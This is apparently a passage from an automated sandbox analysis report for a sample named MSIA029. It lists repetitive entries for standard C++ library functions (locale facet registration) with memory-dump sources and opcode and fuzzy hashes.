                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: bfe93805af8b9b1601ce4dcb64efd033c2150b06ca44362521f467468a76a4fc
                                                                                                                                                                                                                                                  • Instruction ID: 8b465e6ed646679e45021f85be36f7fd5f748ce909e6dc61849e7100831128a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe93805af8b9b1601ce4dcb64efd033c2150b06ca44362521f467468a76a4fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF01C031900619DBCB05EB648C516BE7BB1AF84730F240419F914AB2D2CFB89E05FB91
                                                                                                                                                                                                                                                  Function 00F42837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4283E
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42848
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42899
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F428B9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: e20f554653cd1a90f54a0856624c2a71c1ee2477162cc89cd5a99a806fbc5629
                                                                                                                                                                                                                                                  • Instruction ID: 2ef76981eb427b07a01295e26658abca04a02e4e47d8419327f8f8b35b983e05
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e20f554653cd1a90f54a0856624c2a71c1ee2477162cc89cd5a99a806fbc5629
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E201D631D00519DBCB05EB64CC41ABE7B71BF80760F240519F9146B2D2CF789E05AB91
                                                                                                                                                                                                                                                  Function 00F4E96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4E974
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E97E
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4E9CF
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E9EF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 83ece8bae81e0cef8b55fe3888d31d95fef50ea688a5f5b24b0de6c1cf0e1020
                                                                                                                                                                                                                                                  • Instruction ID: d346ff952cc74fbd5fad278a98893f5e87971d98b822b2827a8c6ce8d7ea0d88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83ece8bae81e0cef8b55fe3888d31d95fef50ea688a5f5b24b0de6c1cf0e1020
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901D231900229DBCB05EB68CC416BE7BA0BF80720F250549FA106B3D2DF789E01FB91
                                                                                                                                                                                                                                                  Function 00F4EA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EA09
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EA13
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EA64
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EA84
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                                                                                                  • Instruction ID: 28f1b08247a5bc8eb2730b30590a1217b8c568395f9a8e7cf4e887dd2bdec752
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801C031900219DBCB05EB648C456BE7B60BF84730F2A0909F900AB3D2CF7C9E05AB91
                                                                                                                                                                                                                                                  Function 00F4EBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EBC8
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EBD2
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EC23
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EC43
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                                                                                                  • Instruction ID: ef79ea34dee95957e4b35d77ce56ad2102214fc497a9e6662f94e52ae458c276
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B001C431900119DBCB15EB648C466BE7B70BF80760F240449FA146B2D2CF789E05E791
                                                                                                                                                                                                                                                  Function 00F42BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42BBC
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42BC6
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42C17
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42C37
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                                                                                                  • Instruction ID: d8490209b1eec59f888a2a37465c2e5511af13464640d3a5ec6d586248030a21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3501C431900619DBCB15FBA49C416BE7B70AF80730F254419FA106B2D2DF789E05EB91
                                                                                                                                                                                                                                                  Function 00F42CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42CE6
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42CF0
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42D41
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42D61
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                                                                                                  • Instruction ID: 0530460ec83afea53cf67d2400ab243ccd203f0cb20771b4071cf2379c38bcd3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4101AD31D00219DBCB15EB649C41AAE7B71BF84720F240559F9046B2D2CFB89E05EB91
                                                                                                                                                                                                                                                  Function 00F4EC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EC5D
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EC67
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4ECB8
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4ECD8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                                                                                                  • Instruction ID: af0b257b97dee98e9525ceafa08473e3e5088e3e08a5ce97722b63d61d6fb2db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9801AD31D00219DBCB05AB649C81AAE7B71BF80770F250409FA056B2D2CF789A05EB91
                                                                                                                                                                                                                                                  Function 00F42C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42C51
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42C5B
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42CAC
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42CCC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                                                                                                  • Instruction ID: 18066facfc310acf9f892b381b8357230f48d7354ae179bb3c25c57d427d0f86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01C035901219DBCB15EBA89C816BE7BA0AF80730F250419FA106B3D2CF789E01BB91
                                                                                                                                                                                                                                                  Function 00F42E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42EA5
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42EAF
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42F00
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42F20
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                                                                                                  • Instruction ID: af66b203ffaf989b298bd33322cc3cd7dcddd86842dfad7460ed29276f719b0f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A01D231900219DBCB05EB64DC41ABE7B70BF80720F640459F914AB2D2CF789E05FB91
                                                                                                                                                                                                                                                  Function 00F42E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42E10
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42E1A
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42E6B
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42E8B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: da6f2a6c327c3850944594b39d306414b56ba4033021874b4c2fec8719f6127f
                                                                                                                                                                                                                                                  • Instruction ID: 42cd417f7ed3b727901e139567ca4c4debd4a8afeb01891daa9667f7a953831a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da6f2a6c327c3850944594b39d306414b56ba4033021874b4c2fec8719f6127f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C701C432900619DBCB05EB64CC41ABE7B61BF94760F240959FD146B2D2CF789E05AB91
                                                                                                                                                                                                                                                  Function 00F42F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42F3A
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42F44
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42F95
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42FB5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 7325409ab48030eec458f766c0680f65d1f0d6fe7bc8787080a7118726776d40
                                                                                                                                                                                                                                                  • Instruction ID: d273f61df5bbd8bce04d0fc89b86185f8265fea8a235cc7fd53743a7070d9db4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7325409ab48030eec458f766c0680f65d1f0d6fe7bc8787080a7118726776d40
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6101C431A00519DBCB05EBA49C416BEBB71BF84730F640559F9046B3D2CF789E05EB91
